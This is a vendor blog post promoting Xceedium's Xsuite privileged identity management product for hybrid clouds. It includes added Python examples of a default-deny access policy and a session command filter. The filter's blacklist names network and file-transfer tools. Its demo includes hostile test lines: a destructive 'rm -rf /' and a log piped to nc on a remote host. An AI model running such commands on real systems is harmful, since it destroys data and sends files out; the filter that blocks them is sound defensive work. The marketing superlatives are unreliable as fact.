Part 3: Privileged Identity Management Controls for the Hybrid Cloud
So far, we’ve discussed some of the overall market trends driving migration to the hybrid cloud, and what the migration implies for privileged identity management systems. Today, we’ll talk about specific features and capabilities we believe are essential to the task.
Xceedium was the first privileged identity management vendor to deliver a comprehensive, integrated solution that spans the whole of the hybrid cloud. In working with customers, we’ve identified several privileged identity management capabilities essential to success. Xsuite, Xceedium’s hybrid cloud privileged identity management solution, delivers all these controls and more.
“…With virtualization, privileged account management and maintaining separation of duties in that environment is a pretty complex problem. If you get privileged access at the hypervisor level you can do a whole lot more damage than just getting access to a single application” – Lori Rowland, Gartner Managing VP
Vault and Manage Credentials and Passwords
Given that they represent the proverbial “keys to the kingdom,” and considering the value of the assets they protect, the way most organizations protect and manage privileged credentials is shocking. Typically stored in spreadsheets or flat files and shared indiscriminately, these credentials are, for all practical purposes, unprotected in most organizations.
So the first step in establishing control over privileged identity management is to capture, vault, and manage these privileged credentials, protecting them from disclosure within a secure, encrypted vault. (Xsuite provides its own secure storage facility, and offers an integrated SafeNet HSM option for high-assurance requirements.) Administrative credentials are not the only ones that need managing: application-to-application passwords, which applications and scripts use to reach databases and other systems, are typically hard-coded into the application or script itself and pose a serious risk of loss or disclosure.
Xsuite manages passwords: it creates and maintains them, establishes and enforces complexity and change requirements, and gives privileged users direct and indirect access by interacting with target systems on their behalf. Unlike systems that implement only check-out features, which rely on users cutting and pasting passwords to reach systems, credentials managed by Xsuite are passed directly to the target systems. Critical credentials are therefore never exposed to end users or to their endpoints, where viruses or malware could steal, lose, or corrupt them, and inadvertent disclosure to rogue users or malware is eliminated.
Positive User Authentication
When working with such sensitive resources, positive user authentication is essential. That’s true not just for reasons of security: auditors increasingly want to know exactly who conducted a privileged transaction, even when administrators use shared privileged accounts like root. Xsuite can leverage existing identity stores such as Active Directory, and protocols like RADIUS, to positively identify individuals and ascertain their group memberships and role definitions. As an adjunct, Xsuite is tightly integrated with several multi-factor authentication technologies, including SafeNet smartcards and RSA SecurID hardware tokens.
Control Visibility and Access
In many networks, authentication is functionally equivalent to access control: once on the network, an individual gains visibility to resources across it. Even without direct authorization to a specific system, users can leverage this visibility to simplify their efforts to reach high-value targets. Given prevailing credential storage practices, that task simply isn’t hard. This approach clearly delivers inadequate control.
This weakness is overcome by expressly separating authentication and access control. Authentication serves simply to identify an individual user. Access to specific systems should be controlled based on established organizational policies.
With Xsuite, authentication merely confirms an individual’s identity. Access to resources is managed by a completely different part of the system, controlled by specific, explicit policies. Once authenticated, users are presented with a list of only those servers and network resources they are explicitly authorized to access. Xsuite also controls which methods can be used to reach target systems (such as SSH, RDP, and web applications). Privileged users simply never see resources they’re not authorized to access.
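The separation just described can be made concrete with a small policy evaluator. The following is an added illustration, not Xsuite code and not a description of how Xsuite implements its policies: authentication returns nothing but an identity and its group memberships, and a separate, explicit, default-deny policy decides which targets and which protocols that identity may reach. All hostnames, group names and the directory snapshot are constructed for the example.

```python
"""Authentication yields identity and groups only; a separate policy grants
visibility and protocols. Added example, not Xsuite code."""
from dataclasses import dataclass

# Constructed inventory of target systems (hypothetical hostnames).
TARGETS = {
    "db-prod-01": {"env": "prod", "protocols": {"ssh"}},
    "win-ad-01":  {"env": "prod", "protocols": {"rdp"}},
    "web-admin":  {"env": "prod", "protocols": {"https"}},
    "dev-box-07": {"env": "dev",  "protocols": {"ssh", "rdp"}},
}

# Constructed identity-store snapshot: the only thing authentication returns.
DIRECTORY = {"alice": {"dba"}, "bob": {"developers", "contractors"}, "eve": set()}


@dataclass(frozen=True)
class Rule:
    group: str            # group name as known to the identity store
    target: str           # exact hostname or an "env:<name>" selector
    protocols: frozenset  # access methods granted or denied on that target
    effect: str = "allow"  # "allow" or "deny"; a deny always wins


# Constructed access policy. Anything not listed here is invisible.
POLICY = [
    Rule("dba",         "db-prod-01", frozenset({"ssh"})),
    Rule("winadmins",   "win-ad-01",  frozenset({"rdp"})),
    Rule("webadmins",   "web-admin",  frozenset({"https"})),
    Rule("developers",  "env:dev",    frozenset({"ssh", "rdp"})),
    Rule("contractors", "env:dev",    frozenset({"ssh"})),
    Rule("contractors", "dev-box-07", frozenset({"rdp"}), effect="deny"),
]


def authenticate(username, directory=DIRECTORY):
    """Stand-in for the AD/RADIUS step: proves who the user is and returns
    (identity, groups). It grants access to nothing."""
    if username not in directory:
        raise PermissionError(f"unknown user {username!r}")
    return username, set(directory[username])


def _matches(rule, hostname):
    if rule.target.startswith("env:"):
        return TARGETS[hostname]["env"] == rule.target[len("env:"):]
    return rule.target == hostname


def visible_targets(groups):
    """Return {hostname: protocols} the user may reach. Hosts with no granted
    protocol are omitted entirely, so the user never sees them."""
    groups = set(groups)
    result = {}
    for host, info in TARGETS.items():
        allowed, denied = set(), set()
        for rule in POLICY:
            if rule.group in groups and _matches(rule, host):
                (denied if rule.effect == "deny" else allowed).update(rule.protocols)
        # deny beats allow, and a protocol the host does not offer is never granted
        protocols = (allowed - denied) & info["protocols"]
        if protocols:
            result[host] = protocols
    return result


def authorize(groups, hostname, protocol):
    """Per-connection decision: only what visible_targets() lists is allowed."""
    return protocol in visible_targets(groups).get(hostname, set())


if __name__ == "__main__":
    for name in DIRECTORY:
        _, groups = authenticate(name)
        print(name, visible_targets(groups))
```

Note that a user in both `developers` and `contractors` loses RDP to `dev-box-07` because the contractor deny rule takes precedence, and that `eve`, who authenticates successfully but belongs to no group, sees nothing at all: being on the network proves identity, not entitlement.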
Monitor Sessions and Control Command Execution
Given the risks associated with privileged users, activity should be monitored continuously. Users should only be allowed to execute authorized commands. Ideally, control should be extended to the execution of individual arguments and parameters of commands. Unauthorized commands should be proactively rejected, and prevented from executing.
Xsuite controls sessions through a combination of policy-based “white” and “black” command lists. Whitelisted commands are allowed, subject to the constraints defined within a session policy. Blacklisted commands are discarded. Each session is proactively monitored and all activity is logged.
If a user attempts to execute an unauthorized command, multiple responses are available. At the most basic level, the command is blocked, the violation is logged, and the user is warned of the policy violation. It’s also possible to generate alerts for dispatch to the Security Operations Center or monitoring team. For particularly egregious violations, a session can be terminated. Optionally, an offending user’s account can be temporarily suspended, preventing reuse until the incident is investigated and resolved satisfactorily.
A picture, it’s said, is worth 1,000 words. And that’s true when it comes to supervising privileged user activity. Xsuite records full user sessions across RDP, SSH, and web/browser-based applications. Session recordings—optimized for economical storage use—are viewed using a DVR-like playback interface. Recordings can be stopped, started, rewound, fast-forwarded, and more. That simplifies the task of reviewing individual sessions. Attempted policy violations are captured and integrated with the recording. A reviewer can simply jump ahead to the next recorded policy violation to speed evaluation and resolution efforts.
Prevent Leapfrogging and Contain Access
A common attack vector leverages access to relatively inconsequential systems as a pathway to more interesting and rewarding devices. Attackers begin with lightly defended systems, taking control and using that foothold to attack the next step in the chain. Exploiting these attack paths depends on visibility into the network, since the attacker must identify and reach the next waypoint on the path to the ultimate reward.
Xsuite prevents this activity by controlling visibility into the network. Privileged users see only those systems to which policies provide access. Given Xsuite’s powerful password vaulting and protection capabilities, if a rogue user did manage to gain access to an unauthorized system (perhaps by walking up to it in the data center), it would still be extremely difficult to gain access. Privileged passwords and credentials are protected in the secure, encrypted credential safe.
Additional protections against leapfrogging are provided by command filtering capabilities on target systems. Individual commands are intercepted and examined for compliance with policies. Unauthorized commands are proactively rejected—accompanied by security alerts, logs, warnings, and even session termination. So, even if an individual somehow gains visibility to a given system, access attempts can be thwarted.
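The command controls described in the monitoring section above, and reused here against leapfrogging, amount to a filter that sits between the privileged user and the target. The block below is an added illustration of such a filter, not Xsuite code and not a description of Xsuite's internal policy format. It shows the pieces a practitioner would expect: per-command argument constraints, a blacklist that wins over the whitelist, rejection of shell constructs that would let a permitted command smuggle in a forbidden one (pipes, `;`, command substitution, redirection), graded responses that escalate from block-and-warn to alert to session termination, and an audit record that names the authenticated individual alongside the shared target account. The policy, hostnames and commands are constructed for the example.

```python
"""Policy-based command filtering for a proxied privileged session.
Added example, not Xsuite code."""
import re
import shlex
from dataclasses import dataclass, field

# Constructs that would let a whitelisted command carry an unfiltered one:
# command substitution and file redirection are rejected outright (fail closed,
# even inside quotes; a proxy cannot afford to guess what the remote shell does).
FORBIDDEN = re.compile(r"`|\$\(|\$\{|[<>]")
# Control operators that start a new command within a single line.
SPLIT = re.compile(r"\|\||&&|[;|&]")


@dataclass(frozen=True)
class SessionPolicy:
    whitelist: dict          # command -> regex every argument must fullmatch (None: any args)
    blacklist: frozenset     # always rejected, regardless of the whitelist
    max_violations: int = 3  # terminate the session at this count


# Constructed policy for a DBA who logs into the shared 'oracle' account.
DBA_POLICY = SessionPolicy(
    whitelist={
        "ls": None,
        "cat": r"/var/log/oracle/[\w.-]+\.log",       # only Oracle log files, no traversal
        "systemctl": r"status|restart|oracle\.service",  # status/restart of one unit only
        "sqlplus": None,
    },
    blacklist=frozenset({"rm", "nc", "ssh", "scp", "curl", "wget", "useradd", "passwd"}),
)


@dataclass
class Session:
    user: str                # authenticated individual (the AD/RADIUS identity)
    target: str              # hostname the session is proxied to
    account: str             # shared account on the target, e.g. root or oracle
    policy: SessionPolicy
    violations: int = 0
    terminated: bool = False
    audit: list = field(default_factory=list)

    def _log(self, outcome, cmdline, reason=""):
        # every record carries the individual, so "who was root" is always answerable
        self.audit.append({"user": self.user, "target": self.target,
                           "account": self.account, "command": cmdline,
                           "outcome": outcome, "reason": reason})

    def _violation(self, cmdline, reason):
        self.violations += 1
        if self.violations >= self.policy.max_violations:
            self.terminated = True
            self._log("terminated", cmdline, reason)
            return "terminate"
        # first offence: block and warn the user; repeats: also alert the SOC
        outcome = "blocked" if self.violations == 1 else "blocked+alert"
        self._log(outcome, cmdline, reason)
        return outcome

    def _check_segment(self, segment):
        """Return None if one pipeline segment is permitted, else the reason it is not."""
        argv = shlex.split(segment)
        if not argv:
            return None
        cmd, args = argv[0], argv[1:]
        if cmd in self.policy.blacklist:
            return f"blacklisted command {cmd!r}"
        if cmd not in self.policy.whitelist:
            return f"command {cmd!r} not whitelisted"
        pattern = self.policy.whitelist[cmd]
        if pattern is not None:
            for arg in args:
                if not re.fullmatch(pattern, arg):
                    return f"argument {arg!r} not permitted for {cmd!r}"
        return None

    def execute(self, cmdline):
        """Filter one command line. Returns allow, blocked, blocked+alert or terminate."""
        if self.terminated:
            self._log("rejected", cmdline, "session already terminated")
            return "terminate"
        if FORBIDDEN.search(cmdline):
            return self._violation(cmdline, "command substitution or redirection")
        try:
            for segment in SPLIT.split(cmdline):
                reason = self._check_segment(segment)
                if reason:
                    return self._violation(cmdline, reason)
        except ValueError as exc:  # unbalanced quotes and similar: fail closed
            return self._violation(cmdline, f"unparseable: {exc}")
        self._log("allowed", cmdline)
        return "allow"


if __name__ == "__main__":
    s = Session("alice", "db-prod-01", "oracle", DBA_POLICY)
    for line in ("cat /var/log/oracle/alert.log", "cat /etc/shadow", "ls; rm -rf /",
                 "cat /var/log/oracle/alert.log | nc 10.0.0.5 4444", "ls"):
        print(f"{s.execute(line):14} {line}")
```

The leapfrogging case is the pipe to `nc`: the first segment is a perfectly legitimate `cat` of an Oracle log, but the second segment is checked on its own and the blacklisted command ends the session. Splitting on control operators before looking up the command is what makes `ls; rm -rf /` a violation rather than a harmless `ls`.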
Shared Account Identity Attribution
By their nature, shared administrative accounts—like root—are anonymous. That poses a risk—but it’s one often accepted, since shared accounts can be used to ease setup and ongoing management burden across a large number of servers. The risk arises since, when multiple individuals make use of the accounts, it’s difficult—impossible in many cases—to determine precisely who actually issued a command. Investigations into incidents—as well as demonstrating compliance with regulatory standards—are stymied because the system can’t conclusively document which individual issued a problematic command.
Even though a user may be logged into a shared account—“root” or “admin” for example—Xsuite knows with precision which user is logged in and using the account, and exactly what he or she is doing (no anonymous activity is permitted). Organizations get the benefit of simplified system configuration and management without the issue of explaining to an auditor why they don’t know “who was root” at 2pm on Tuesday.
In this post, we’ve described the high-level list of functional capabilities required to deliver privileged identity management effectively. As noted earlier, we believe privileged identity management in the hybrid cloud will require solutions spanning all these functional capabilities, across key technology infrastructures like the data center, virtualized servers, and the cloud. Xsuite is the first and only privileged identity management solution that delivers the full set of functionality needed for effective management of privileged users across the entire hybrid cloud. And only Xsuite is available in multiple appliance form factors: a purpose-built, hardened hardware appliance; an Open Virtualization Format (OVF) appliance for VMware vSphere; and an Amazon Machine Image (AMI) that runs on Amazon Web Services EC2 infrastructure.
Previous posts talked about adoption of the hybrid cloud, and implications for privileged identity management. And Part 2 examined what specific changes are needed in privileged identity management technology. Tomorrow, in a bonus Part 4, we’ll provide some specific questions to ask vendors as a way to begin evaluating different solutions.